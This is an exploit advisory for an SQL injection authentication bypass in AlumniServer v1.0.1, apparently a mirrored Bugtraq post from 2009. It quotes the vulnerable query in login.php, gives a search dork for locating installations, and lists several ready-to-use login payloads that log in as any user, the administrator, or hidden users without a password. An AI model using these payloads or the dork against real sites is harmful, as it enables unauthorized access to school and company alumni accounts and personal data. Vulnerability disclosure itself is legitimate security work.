AlumniServer v-1.0.1 Sql Injection

2009.06.26
Credit: YEnH4ckEr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

--------------------------------------------------------- SQL INJECTION VULNERABILITY --AlumniServer v-1.0.1--> --------------------------------------------------------- CMS INFORMATION: -->WEB: http://www.alumniserver.net/ -->DOWNLOAD: http://www.alumniserver.net/ -->DEMO: N/A -->CATEGORY: CMS/Education -->DESCRIPTION: Open Source Alumni software, based on PHP+MySQL for universities, schools and companies. Services for usersinclude profile page,... -->RELEASED: 2009-06-11 CMS VULNERABILITY: -->TESTED ON: firefox 3 -->DORK: "AlumniServer project" -->CATEGORY: AUTH-BYPASS (SQLi) -->AFFECT VERSION: CURRENT -->Discovered Bug date: 2009-06-16 -->Reported Bug date: 2009-06-16 -->Fixed bug date: N/A -->Info patch (????): N/A -->Author: YEnH4ckEr -->mail: y3nh4ck3r[at]gmail[dot]com -->WEB/BLOG: N/A -->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo. -->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!) ##################### //////////////////// AUTH-BYPASS (SQLi): //////////////////// ##################### <<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>> ----------- VULN FILE: ----------- Path --> [HOME_PATH]/login.php Lines --> 26, 32, 72 //Note: requestVar is a function against LFI and XSS mainly, //avoiding register_globals ON and filtering \r\n, \r, \0, etc and using htmlespecialchars. ... 26: $email=requestVar('login','',true); ... 32: $pwd=requestVar('password','',true); ... 72: $result=mysql_query("SELECT * FROM `as_users` WHERE (email LIKE '".$email."') AND (password LIKE '".md5($pwd)."') LIMIT 1",$dbh); <-- Vuln line ... ----------- EXPLOITS: ----------- [!!!] Case-1: If only one user (rarely)... ~~~~~> E-Mail=y3nh4ck3r_at_gmail&#46;com') OR 1=1 /* ~~~~~> Password=nothing [!!!] Case-2: If more users... [++] Note: Search mail for admin (http://[HOST]/[PATH]/Imprint.php): ~~~~~> E-Mail=[real_admin_mail]')/* ~~~~~> Password=nothing [++] Note: Search for first or second name. [++] Note: AdminGn, AdminSn By default. Not use id because it's generated randomly. With a registered user is easy to get necessary information. ~~~~~> E-Mail=y3nh4ck3r_at_gmail&#46;com') OR gn='AdminGn' /* ~~~~~> Password=nothing [!!!] Case-3: If admin is a hidden user... ~~~~~> E-Mail=y3nh4ck3r_at_gmail&#46;com') OR hideuser='y' /* ~~~~~> Password=nothing

References:

http://seclists.org/bugtraq/2009/Jun/0235.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top